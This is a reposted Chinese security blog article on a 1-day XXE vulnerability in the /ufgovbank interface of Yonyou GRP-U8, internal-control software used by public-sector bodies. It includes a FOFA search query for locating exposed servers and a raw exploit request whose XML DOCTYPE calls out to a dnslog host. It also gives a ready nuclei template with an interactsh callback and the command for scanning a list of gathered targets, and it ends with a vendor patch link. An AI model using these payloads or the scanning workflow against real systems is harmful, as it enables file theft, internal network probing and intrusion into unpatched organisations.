【在野1day】用友GRP-U8 ufgovbank XXE漏洞

admin 2024年1月10日12:27:16评论40 views字数 2457阅读8分11秒阅读模式

使

福利:小编整理了大量电子书和护网常用工具,在文末免费获取。

介绍漏洞前先介绍下什么是XXE漏洞?

    XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

  XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XXE漏洞的基础上,发展出了Blind XXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛,此外,网上有一些在线XML格式化工具也存在过问题。

01

漏洞名称

用友GRP-U8 ufgovbank XXE漏洞

02

漏洞影响

用友GRP-U8

【在野1day】用友GRP-U8 ufgovbank XXE漏洞

03

漏洞描述

用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该系统/ufgovbank接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害

04

FOFA搜索语句
app="用友-GRP-U8"

【在野1day】用友GRP-U8 ufgovbank XXE漏洞

05

漏洞复现

注册一个dnslog平台的账号,用于回显,如http://dnslog.pw/dns/?&monitor=true,注册好之后勾选自动刷新选项,然后向靶场发送如下数据包,让靶场解析xml数据然后访问dns

POST /ufgovbank HTTP/1.1Host: 192.168.40.130:222User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Connection: closeContent-Length: 161Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipreqData=<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

在DNSlog平台能看到一条访问记录

【在野1day】用友GRP-U8 ufgovbank XXE漏洞

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: yonyou-grp-u8-ufgovbank-xxeinfo:  name: 用友GRP-U8 ufgovbank XXE漏洞  author: fgz  severity: critical  description: 用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该系统/ufgovbank接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。  metadata:    max-request: 1    fofa-query: app="用友-GRP-U8"    verified: truerequests:  - raw:      - |+        POST /ufgovbank HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Content-Type: application/x-www-form-urlencoded        reqData=<?xml version="1.0"?>        <!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest    matchers:      - type: dsl        dsl:          - contains(interactsh_protocol, "dns")        condition: and

运行POC进行漏洞检测

nuclei.exe -t mypoc/用友/yonyou-grp-u8-ufgovbank-xxe.yaml -l data/用友-GRP-U8.txt

【在野1day】用友GRP-U8 ufgovbank XXE漏洞

07

修复建议

用友安全中心在2024年1月2号发布了漏洞补丁,补丁链接如下,请自行升级。

https://security.yonyou.com/#/patchInfo?identifier=f234175cba534454adbe1caf9dc2fc88

08

原文始发于微信公众号(AI与网安):【在野1day】用友GRP-U8 ufgovbank XXE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月10日12:27:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【在野1day】用友GRP-U8 ufgovbank XXE漏洞http://cn-sec.com/archives/2380696.html

发表评论

匿名网友 填写信息